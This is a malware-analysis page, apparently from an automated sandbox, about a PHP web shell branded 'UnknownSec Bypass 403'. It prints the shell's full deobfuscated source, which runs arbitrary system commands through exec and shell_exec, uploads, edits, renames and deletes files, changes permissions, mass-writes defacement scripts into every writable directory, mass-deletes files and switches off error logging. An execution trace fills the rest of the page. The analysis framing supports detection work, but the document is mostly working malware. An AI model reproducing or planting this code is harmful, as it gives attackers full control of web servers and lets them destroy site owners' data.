PHP Malware Analysis
bypass403.PHP, bypass403.phtml
md5: 361ca8ea9a0112eb9172e39c5c3313f7
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- unknownsec1337@gmail.com (Deobfuscated, Original)
Environment
- error_reporting (Deobfuscated, Original, Traces)
- getcwd (Deobfuscated, Original, Traces)
- php_uname (Deobfuscated, Original)
- set_time_limit (Deobfuscated, Original, Traces)
Execution
- exec (Deobfuscated, Original)
- shell_exec (Deobfuscated, Original)
Files
- copy (Deobfuscated, Original)
- file_get_contents (Deobfuscated, Original)
- file_put_contents (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Title
- " . $_SERVER['HTTP_HOST'] . " - {$▛} 403 (Deobfuscated)
- ".$_SERVER['HTTP_HOST']." - $▛ 403 (Original)
- localhost - UnknownSec 403 (HTML)
URLs
- ftp.sh/AnonSec.jpg (Deobfuscated, Original)
- ftp.sh/main/style.css (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<?php
/* ~ Mau recode? izin dulu, recode ga izin itu ga keren ajg
~ V.02
~ Thanks to all mem AnonSec Team and all friend.
~ Untuk beberapa tools gw ambil dari indoxploit, karena tidak semuanya gw otakin sendiri.
*/
set_time_limit(0);
error_reporting(0);
@ini_set('error_log', null);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
$▛ = 'UnknownSec';
$▘ = "<style>table{display:none;}</style>";
if (isset($_GET['option']) && $_POST['opt'] == 'download') {
header('Content-type: text/plain');
header('Content-Disposition: attachment; filename="' . $_POST['name'] . '"');
echo file_get_contents($_POST['path']);
exit;
}
if (get_magic_quotes_gpc()) {
foreach ($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
}
function ▟($dir, $p)
{
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
return "<font color='green'>" . $p . "</font>";
} else {
return "<font color='red'>" . $p . "</font>";
}
}
function dc($dir, $p)
{
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
return "<font color='green'>" . $p . "</font>";
} else {
return "<font color='red'>" . $p . "</font>";
}
}
function ip()
{
$ipas = '';
if (getenv('HTTP_CLIENT_IP')) {
$ipas = getenv('HTTP_CLIENT_IP');
} else {
if (getenv('HTTP_X_FORWARDED_FOR')) {
$ipas = getenv('HTTP_X_FORWARDED_FOR');
} else {
if (getenv('HTTP_X_FORWARDED')) {
$ipas = getenv('HTTP_X_FORWARDED');
} else {
if (getenv('HTTP_FORWARDED_FOR')) {
$ipas = getenv('HTTP_FORWARDED_FOR');
} else {
if (getenv('HTTP_FORWARDED')) {
$ipas = getenv('HTTP_FORWARDED');
} else {
if (getenv('REMOTE_ADDR')) {
$ipas = getenv('REMOTE_ADDR');
} else {
$ipas = 'IP tidak dikenali';
}
}
}
}
}
}
return $ipas;
}
function ekse()
{
$cmd = "whoami";
$return = "";
$output = "";
$methodArray = array();
//exec()
$return = "";
$output = "";
exec($cmd, $output, $return);
if (strlen($output[0]) > 0 && true) {
$methodArray[] = "exec";
}
//shell_exec()
$return = "";
$output = "";
$output = shell_exec($cmd);
if (strlen($output) > 0) {
$methodArray[] = "shell_exec";
}
return $methodArray;
}
function ekseCMD($cmd, $method)
{
if ($method == "") {
ob_start();
$methodArray = ekse();
ob_end_clean();
if (is_array($methodArray)) {
$method = $methodArray[0];
}
}
switch ($method) {
case "exec":
exec($cmd, $output);
var_dump($output);
break;
case "shell_exec":
echo shell_exec($cmd);
break;
}
}
$cmd = htmlspecialchars($_POST["cmd"]);
$method = htmlspecialchars($_POST["execCMD"]);
function p($file)
{
$p = fileperms($file);
if (($p & 0xc000) == 0xc000) {
$i = 's';
} elseif (($p & 0xa000) == 0xa000) {
$i = 'l';
} elseif (($p & 0x8000) == 0x8000) {
$i = '-';
} elseif (($p & 0x6000) == 0x6000) {
$i = 'b';
} elseif (($p & 0x4000) == 0x4000) {
$i = 'd';
} elseif (($p & 0x2000) == 0x2000) {
$i = 'c';
} elseif (($p & 0x1000) == 0x1000) {
$i = 'p';
} else {
$i = 'u';
}
$i .= $p & 0x100 ? 'r' : '-';
$i .= $p & 0x80 ? 'w' : '-';
$i .= $p & 0x40 ? $p & 0x800 ? 's' : 'x' : ($p & 0x800 ? 'S' : '-');
$i .= $p & 0x20 ? 'r' : '-';
$i .= $p & 0x10 ? 'w' : '-';
$i .= $p & 0x8 ? $p & 0x400 ? 's' : 'x' : ($p & 0x400 ? 'S' : '-');
$i .= $p & 0x4 ? 'r' : '-';
$i .= $p & 0x2 ? 'w' : '-';
$i .= $p & 0x1 ? $p & 0x200 ? 't' : 'x' : ($p & 0x200 ? 'T' : '-');
return $i;
}
echo "\n<!DOCTYPE HTML>\n<html>\n\t<head>\n\t\t<meta name='author' content='{$▛}'>\n\t\t<meta name='robots' content='NOINDEX, NOFOLLOW'>\n\t\t<title>" . $_SERVER['HTTP_HOST'] . " - {$▛} 403</title>\n\t\t<meta name='viewport' content='width=device-width, initial-scale=0.70, user-scalable=no'>\n\t\t<link rel='stylesheet' href='//unknownsec.ftp.sh/main/style.css'>\n\t\t<script src='//maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>\n\t\t<script src='//cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/7.33.1/sweetalert2.min.js'></script>\n\t</head>\n<body class='bg-secondary text-light'>\n<div class='container-fluid'>\n\t<div class='py-3' id='main'>\n\t\t<div class='box shadow bg-dark p-4 rounded-3'>\n\t\t<a class='text-decoration-none text-light' href='" . $_SERVER['PHP_SELF'] . "'><h4>{$▛} Bypass <i class='bi bi-bug-fill'></i> 403</h4></a>";
if (isset($_GET['path'])) {
$path = $_GET['path'];
} else {
$path = getcwd();
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo "<i class=\"bi bi-hdd-rack\"></i> : <a class=\"text-decoration-none text-light\" href=\"?path=/\">/</a>";
continue;
}
if ($pat == '') {
continue;
}
echo "<a class=\"text-decoration-none\" href=\"?path=";
for ($i = 0; $i <= $id; $i++) {
echo "{$paths[$i]}";
if ($i != $id) {
echo "/";
}
}
echo '">' . $pat . '</a>/';
}
echo " [ " . ▟($path, p($path)) . " ]";
echo "\n<div class='dropdown'>\n\t<button class='btn btn-outline-light dropdown-toggle btn-sm' type='button' id='dropdownMenuButton' data-toggle='dropdown' aria-haspopup='true' aria-expanded='false'><i class='bi bi-menu-down'></i> Menu</button>\n\t<div class='dropdown-menu'>\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=upload'><i class='bi bi-upload'></i> Upload</a>\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=depes'><i class='bi bi-exclamation-diamond'></i> Mass depes</a>\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=delete'><i class='bi bi-trash'></i> Mass delete</a>\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=cmd'><i class='bi bi-terminal'></i> Terminal</a>\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=info'><i class='bi bi-info-circle'></i> Info server</a>\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=about'><i class='bi bi-info'></i> About</a></h5>\n\t</div>\n</div>";
// tools nya
if (isset($_GET['dir'])) {
$dir = $_GET['dir'];
chdir($dir);
} else {
$dir = getcwd();
}
$dir = str_replace("\\", "/", $dir);
$scdir = explode("/", $dir);
for ($i = 0; $i <= $c_dir; $i++) {
$scdir[$i];
if ($i != $c_dir) {
} elseif ($_GET['id'] == 'depes') {
function mass_kabeh($dir, $namafile, $isi_script)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "[<font color=green>success</font>] {$▚}<br>";
file_put_contents($▚, $isi_script);
$▟ = mass_kabeh($dirc, $namafile, $isi_script);
}
}
}
}
}
}
function mass_biasa($dir, $namafile, $isi_script)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "[<font color=green>success</font>] {$dirb}/{$namafile}<br>";
file_put_contents($▚, $isi_script);
}
}
}
}
}
}
if ($_POST['start']) {
if ($_POST['tipe'] == 'massal') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_kabeh($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
} elseif ($_POST['tipe'] == 'biasa') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
}
} else {
echo "<br />{$▘}\n<form method='post'>\n\t<b>Tipe:</b><br>\n<div class='custom-control custom-switch'>\n\t<input type='checkbox' id='customSwitch' class='custom-control-input' name='tipe' value='biasa'>\n\t<label class='custom-control-label' for='customSwitch'>Biasa</label>\n</div>\n<div class='custom-control custom-switch'>\n\t<input type='checkbox' id='customSwitch1' class='custom-control-input' name='tipe' value='massal'>\n\t<label class='custom-control-label' for='customSwitch1'>Massal</label>\n</div>\n\t<b><i class='bi bi-folder'></i> Lokasi:</b>\n\t<input class='form-control' type='text' name='d_dir' value='{$dir}' height='10'>\n\t<b><i class='bi bi-file-earmark'></i> File name:</b>\n\t<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'>\n\t<b><i class='bi bi-file-earmark'></i> Your script:</b>\n\t<textarea class='form-control' rows='7' name='script' placeholder='your secript here'></textarea><br />\n\t<input type='submit' name='start' value='Go' class='btn btn-outline-light'>\n</form>";
}
} elseif ($_GET['id'] == 'info') {
$disfunc = @ini_get("disable_functions");
if (empty($disfunc)) {
$disfc = "<font color=green>NONE</font>";
} else {
$disfc = "<font color=red>{$disfunc}</font>";
}
if (!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$sm = @ini_get(strtolower("safe_mode")) == 'on' ? "<font color=red>ON</font>" : "<font color=green>OFF</font>";
echo '<br />' . $▘ . '
<div class="container">
<div class="card text-dark">
<div class="card-header">';
echo "<b>Uname: </b><font color=green>" . php_uname() . "</font><br />";
echo "<b>Software: </b><font color=green>" . $_SERVER['SERVER_SOFTWARE'] . "</font><br />";
echo "<b>PHP version: </b><font color=green>PHP_VERSION</font> <b>PHP os:</b> <font color=green>PHP_OS</font><br />";
echo "<b>Server Ip: </b><font color=green>" . gethostbyname($_SERVER['HTTP_HOST']) . "</font><br />";
echo "<b>Your Ip: </b><font color=green>" . ip() . "</font><br />";
echo "<b>User: </b><font color=green>{$user}</font> ({$uid}) | <b>Group:</b> <font color=green>{$group}</font> ({$gid})<br />";
echo "<b>Safe Mode: </b>{$sm}<br />";
echo "<kbd>Disable Function:</kbd><pre>{$disfc}</pre>";
echo "</div>\n\t</div>\n</div>";
} elseif ($_GET['id'] == 'about') {
echo '<br />' . $▘ . '
<div class="container">
<div class="card text-dark">
<div class="card-header">';
echo "<img alt='AnonSec Team' class='img-thumbnail rounded mx-auto d-block' src='//unknownsec.ftp.sh/AnonSec.jpg' width='150px'>";
echo "<b>- About Me -</b><br />";
echo "Thanks bre dah pake shell nya, jika ada yang error silahkan hubungi email di bawah.<br />Greetz : <a href=''>{ AnonSec Team } - And You</a><br />My email: <a href='mailto:unknownsec1337@gmail.com'>unknownsec1337@gmail.com</a>";
echo "</div>\n\t</div>\n</div>";
} elseif ($_GET['id'] == 'cmd') {
echo "{$▘}<br>\n<form method='POST'>\n<div class='input-group mb-3'>\n\t<input class='form-control' type='text' name='cmd' value='{$cmd}'>\n\t<select class='bg-dark text-light form-control' name='execCMD'>\n\t\t<option>{$method}</option>";
ob_start();
$methodArray = ekse();
ob_end_clean();
foreach ($methodArray as $value) {
echo "<option>{$value}</option>";
}
echo "</select>\n\t</div>\n</form>";
if ($cmd == "") {
echo "\n<div class='card text-dark'>\n\t<div class='card-header'>\n\t\t<pre>";
ekseCMD("whoami", $method);
echo "</pre>\n\t</div>\n</div>";
} else {
echo "\n<div class='card text-dark'>\n\t<div class='card-header'>\n\t\t<pre><kbd>~\$ " . $cmd . "</kbd><br>";
ekseCMD($cmd, $method);
echo "</pre>\n\t</div>\n</div>";
}
} elseif ($_GET['id'] == 'upload') {
echo '<br />' . $▘ . '
<form action="" method="post" enctype="multipart/form-data">
<div class="input-group mb-3 text-center">
<input type="file" class="form-control form-control-sm" name="file">
<button type="submit" class="btn btn-outline-light btn-sm">Submit</button>
</div>
</form>';
if (isset($_FILES['file'])) {
if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success upload",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed upload",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
}
} elseif ($_GET['id'] == 'delete') {
function hapus_massal($dir, $namafile)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
if (file_exists("{$dir}/{$namafile}")) {
unlink("{$dir}/{$namafile}");
}
} elseif ($dirb === '..') {
if (file_exists("" . dirname($dir) . "/{$namafile}")) {
unlink("" . dirname($dir) . "/{$namafile}");
}
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
if (file_exists($▚)) {
echo "[<font color=green>deleted</font>] {$▚}<br>";
unlink($▚);
$▟ = hapus_massal($dirc, $namafile);
}
}
}
}
}
}
}
if ($_POST['start']) {
echo "<div style='margin: 5px auto; padding: 5px'>";
hapus_massal($_POST['d_dir'], $_POST['d_file']);
echo "</div>";
} else {
echo "<br />{$▘}\n<form method='post'>\n\t<b><i class='bi bi-folder'></i> Lokasi:</b>\n\t<input class='form-control' type='text' name='d_dir' value='{$dir}' height='10'>\n\t<b><i class='bi bi-file-earmark'></i> File name:</b>\n\t<div class='input-group mb-3'>\n\t<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'><br>\n\t<div class='input-group-append'>\n\t<input class='btn btn-outline-light' type='submit' name='start' value='Go'>\n</form>\n\t</div>\n\t</div>";
}
}
}
// akhir tools
if (isset($_GET['filesrc'])) {
echo "<br><b>name : </b>" . basename($_GET['filesrc']);
"</br>";
echo '<textarea class="form-control" rows="7" readonly> ' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</textarea><br />';
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo '<br><b>name : </b>' . basename($_POST['path']);
'</br>';
//Chmod
if ($_POST['opt'] == 'chmod') {
if (isset($_POST['perm'])) {
if (chmod($_POST['path'], $_POST['perm'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success Change Permission",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed change permission",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
}
echo '<form method="POST">
<div class="input-group mb-3">
<input class="form-control" name="perm" type="text" value="' . substr(sprintf('%o', fileperms($_POST['path'])), -4) . '"/>
<input class="form-control" type="hidden" name="path" value="' . $_POST['path'] . '">
<input class="form-control" type="hidden" name="opt" value="chmod">
<div class="input-group-append">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form>
</div>
</div>';
} elseif ($_GET['opt'] == 'btw') {
$cwd = getcwd();
echo '<form action="?option&path=' . $cwd . '&opt=delete&type=buat" method="POST">
<div class="input-group mb-3">
<input class="form-control" name="name" type="text" value="Folder"/>
<input class="form-control" type="hidden" name="path" value="' . $cwd . '">
<input class="form-control" type="hidden" name="opt" value="delete">
<div class="input-group-append">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form>
</div>
</div>';
} elseif ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success change name",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed change name",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
<div class="input-group mb-3">
<input class="form-control" name="newname" type="text" value="' . $_POST['name'] . '" />
<input class="form-control" type="hidden" name="path" value="' . $_POST['path'] . '">
<input class="form-control" type="hidden" name="opt" value="rename">
<div class="input-group-append">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form>
</div>
</div>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Edit file Success",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed edit file",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
fclose($fp);
}
echo '<form method="POST">
<textarea class="form-control" rows="7" name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br />
<input class="form-control" type="hidden" name="path" value="' . $_POST['path'] . '">
<input class="form-control" type="hidden" name="opt" value="edit">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form><br />';
}
} else {
//delete dir
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if (rmdir($_POST['path'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success delete dir",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed delete dir",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
} elseif ($_POST['type'] == 'file') {
if (unlink($_POST['path'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success delete file",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed delete file",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
}
}
echo "</center>";
$scandir = scandir($path);
$pa = getcwd();
echo "<div class=\"table-responsive\">\n<table class=\"table table-hover table-dark text-light\">\n<thead>\n<tr>\n\t<td class=\"text-center\">Name</td>\n\t\t<td class=\"text-center\">Last edit</td>\n\t\t<td class=\"text-center\">Size</td>\n\t\t<td class=\"text-center\">Permission</td>\n\t<td class=\"text-center\">Options</td>\n</tr>\n</thead>\n<tbody class=\"text-nowrap\">";
foreach ($scandir as $dir) {
$dt = date("Y-m-d", filemtime("{$path}/{$dir}"));
if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
continue;
}
echo "\n\t<tr>\n\t<td><i class='bi bi-folder-fill'></i><a class='text-decoration-none text-secondary' href=\"?path={$path}/{$dir}\">{$dir}</a></td>\n\t<td><center>{$dt}</center></td>\n\t<td><center>DIR</center></td>\n\t<td><center>";
if (is_writable("{$path}/{$dir}")) {
echo "<font color=\"green\">";
} elseif (!is_readable("{$path}/{$dir}")) {
echo "<font color=\"red\">";
}
echo p("{$path}/{$dir}");
if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
echo "</font>";
}
echo "</center></td>\n\t<td>\n<form method=\"POST\" action=\"?option&path={$path}\">\n<div class='input-group mb-3 text-center'>\n<select class=\"form-select form-select-sm\" name=\"opt\">\n\t<option selected disabled>Select</option>\n\t<option value=\"delete\">Delete</option>\n\t<option value=\"chmod\">Chmod</option>\n\t<option value=\"rename\">Rename</option>\n</select>\n\t<input type=\"hidden\" name=\"type\" value=\"dir\">\n<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\n\t<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\n\t\t<input class=\"btn btn-outline-light btn-sm\" type=\"submit\" value=\"Go\"/>\n\t</form>\n</div>\n</td>\n</tr>";
}
foreach ($scandir as $file) {
$ft = date("Y-m-d", filemtime("{$path}/{$file}"));
if (!is_file($path . '/' . $file)) {
continue;
}
$s = filesize($path . '/' . $file) / 1024;
$s = round($s, 3);
if ($s >= 1024) {
$s = round($s / 1024, 2) . ' MB';
} else {
$s .= ' KB';
}
echo "\n\t<tr>\n\t<td><i class='bi bi-file-earmark-code-fill'></i><a class='text-decoration-none text-secondary' href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td>\n\t<td><center>{$ft}</center></td>\n\t<td><center>{$s}</center></td>\n\t<td><center>";
if (is_writable("{$path}/{$file}")) {
echo "<font color=\"green\">";
} elseif (!is_readable("{$path}/{$file}")) {
echo "<font color=\"red\">";
}
echo p("{$path}/{$file}");
if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
echo "</font>";
}
echo "</center></td>\n\t<td>\n<form method=\"POST\" action=\"?option&path={$path}\">\n<div class='input-group mb-3 text-center'>\n<select class=\"form-select form-select-sm\"name=\"opt\">\n\t<option selected disabled>Select</option>\n\t\t<option value=\"delete\">Delete</option>\n\t\t<option value=\"edit\">Edit</option>\n\t\t<option value=\"rename\">Rename</option>\n\t\t<option value=\"chmod\">Chmod</option>\n\t<option value=\"download\">Download</option>\n</select>\n<input type=\"hidden\" name=\"type\" value=\"file\">\n\t<input type=\"hidden\" name=\"name\" value=\"{$file}\">\n\t\t<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\n\t\t<input class=\"btn btn-outline-light btn-sm\" type=\"submit\" value=\"Go\"/>\n\t</form>\n</div>\n</td>\n</tr>";
}
}
echo "\n</tbody>\n</table>\n<div class='text-center'>\n\t<kbd>Copyright © " . date("Y") . " - {$▛}</kbd>\n</div>\n\t</div>\n\t\t</div>\n\t</div>\n</div>\n<script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>\n<script src='//cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js'></script>\n<script src='//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>\n</body>\n</html>";Execution traces
data/traces/361ca8ea9a0112eb9172e39c5c3313f7_trace-1676244318.101.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:25:43.998813]
1 0 1 0.000141 393528
1 3 0 0.000773 521520 {main} 1 /var/www/html/uploads/bypass403.PHP 0 0
2 4 0 0.000792 521520 set_time_limit 0 /var/www/html/uploads/bypass403.PHP 7 1 0
2 4 1 0.000809 521584
2 4 R FALSE
2 5 0 0.000824 521552 error_reporting 0 /var/www/html/uploads/bypass403.PHP 8 1 0
2 5 1 0.000837 521592
2 5 R 22527
2 6 0 0.000850 521552 ini_set 0 /var/www/html/uploads/bypass403.PHP 9 2 'error_log' NULL
2 6 1 0.000867 521624
2 6 R ''
2 7 0 0.000880 521552 ini_set 0 /var/www/html/uploads/bypass403.PHP 10 2 'log_errors' 0
2 7 1 0.000894 521624
2 7 R '1'
2 8 0 0.000907 521552 ini_set 0 /var/www/html/uploads/bypass403.PHP 11 2 'max_execution_time' 0
2 8 1 0.000921 521592
2 8 R '0'
2 9 0 0.000933 521520 ini_set 0 /var/www/html/uploads/bypass403.PHP 12 2 'output_buffering' 0
2 9 1 0.000948 521592
2 9 R FALSE
2 10 0 0.000960 521520 ini_set 0 /var/www/html/uploads/bypass403.PHP 13 2 'display_errors' 0
2 10 1 0.000974 521592
2 10 R ''
1 A /var/www/html/uploads/bypass403.PHP 15 $▛ = 'UnknownSec'
1 A /var/www/html/uploads/bypass403.PHP 16 $▘ = '<style>table{display:none;}</style>'
2 11 0 0.001016 521520 get_magic_quotes_gpc 0 /var/www/html/uploads/bypass403.PHP 25 0
2 11 1 0.001029 521520
2 11 R FALSE
2 12 0 0.001046 521520 htmlspecialchars 0 /var/www/html/uploads/bypass403.PHP 114 1 NULL
2 12 1 0.001096 521712
2 12 R ''
1 A /var/www/html/uploads/bypass403.PHP 114 $cmd = ''
2 13 0 0.001121 521680 htmlspecialchars 0 /var/www/html/uploads/bypass403.PHP 115 1 NULL
2 13 1 0.001135 521872
2 13 R ''
1 A /var/www/html/uploads/bypass403.PHP 115 $method = ''
2 14 0 0.001161 521840 getcwd 0 /var/www/html/uploads/bypass403.PHP 174 0
2 14 1 0.001174 521888
2 14 R '/var/www/html/uploads'
1 A /var/www/html/uploads/bypass403.PHP 174 $path = '/var/www/html/uploads'
2 15 0 0.001199 521888 str_replace 0 /var/www/html/uploads/bypass403.PHP 176 3 '\\' '/' '/var/www/html/uploads'
2 15 1 0.001214 521984
2 15 R '/var/www/html/uploads'
1 A /var/www/html/uploads/bypass403.PHP 176 $path = '/var/www/html/uploads'
2 16 0 0.001239 521888 explode 0 /var/www/html/uploads/bypass403.PHP 177 2 '/' '/var/www/html/uploads'
2 16 1 0.001253 522464
2 16 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/bypass403.PHP 177 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/bypass403.PHP 178 $id = 0
1 A /var/www/html/uploads/bypass403.PHP 180 $a = TRUE
1 A /var/www/html/uploads/bypass403.PHP 178 $id = 1
1 A /var/www/html/uploads/bypass403.PHP 186 $i = 0
1 A /var/www/html/uploads/bypass403.PHP 186 $i++
1 A /var/www/html/uploads/bypass403.PHP 186 $i++
1 A /var/www/html/uploads/bypass403.PHP 178 $id = 2
1 A /var/www/html/uploads/bypass403.PHP 186 $i = 0
1 A /var/www/html/uploads/bypass403.PHP 186 $i++
1 A /var/www/html/uploads/bypass403.PHP 186 $i++
1 A /var/www/html/uploads/bypass403.PHP 186 $i++
1 A /var/www/html/uploads/bypass403.PHP 178 $id = 3
1 A /var/www/html/uploads/bypass403.PHP 186 $i = 0
1 A /var/www/html/uploads/bypass403.PHP 186 $i++
1 A /var/www/html/uploads/bypass403.PHP 186 $i++
1 A /var/www/html/uploads/bypass403.PHP 186 $i++
1 A /var/www/html/uploads/bypass403.PHP 186 $i++
1 A /var/www/html/uploads/bypass403.PHP 178 $id = 4
1 A /var/www/html/uploads/bypass403.PHP 186 $i = 0
1 A /var/www/html/uploads/bypass403.PHP 186 $i++
1 A /var/www/html/uploads/bypass403.PHP 186 $i++
1 A /var/www/html/uploads/bypass403.PHP 186 $i++
1 A /var/www/html/uploads/bypass403.PHP 186 $i++
1 A /var/www/html/uploads/bypass403.PHP 186 $i++
2 17 0 0.001493 522392 p 1 /var/www/html/uploads/bypass403.PHP 192 1 '/var/www/html/uploads'
3 18 0 0.001506 522392 fileperms 0 /var/www/html/uploads/bypass403.PHP 118 1 '/var/www/html/uploads'
3 18 1 0.001528 522456
3 18 R 16895
2 A /var/www/html/uploads/bypass403.PHP 118 $p = 16895
2 A /var/www/html/uploads/bypass403.PHP 128 $i = 'd'
2 A /var/www/html/uploads/bypass403.PHP 136 $i .= 'r'
2 A /var/www/html/uploads/bypass403.PHP 137 $i .= 'w'
2 A /var/www/html/uploads/bypass403.PHP 140 $i .= 'x'
2 A /var/www/html/uploads/bypass403.PHP 141 $i .= 'r'
2 A /var/www/html/uploads/bypass403.PHP 142 $i .= 'w'
2 A /var/www/html/uploads/bypass403.PHP 145 $i .= 'x'
2 A /var/www/html/uploads/bypass403.PHP 146 $i .= 'r'
2 A /var/www/html/uploads/bypass403.PHP 147 $i .= 'w'
2 A /var/www/html/uploads/bypass403.PHP 150 $i .= 'x'
2 17 1 0.001648 522456
2 17 R 'drwxrwxrwx'
2 19 0 0.001662 522456 ▟ 1 /var/www/html/uploads/bypass403.PHP 192 2 '/var/www/html/uploads' 'drwxrwxrwx'
3 20 0 0.001676 522456 getcwd 0 /var/www/html/uploads/bypass403.PHP 35 0
3 20 1 0.001688 522504
3 20 R '/var/www/html/uploads'
2 A /var/www/html/uploads/bypass403.PHP 35 $▚ = '/var/www/html/uploads'
3 21 0 0.001713 522504 is_writable 0 /var/www/html/uploads/bypass403.PHP 37 1 '/var/www/html/uploads'
3 21 1 0.001731 522544
3 21 R TRUE
2 19 1 0.001745 522520
2 19 R '<font color=\'green\'>drwxrwxrwx</font>'
2 22 0 0.001762 522416 getcwd 0 /var/www/html/uploads/bypass403.PHP 210 0
2 22 1 0.001774 522464
2 22 R '/var/www/html/uploads'
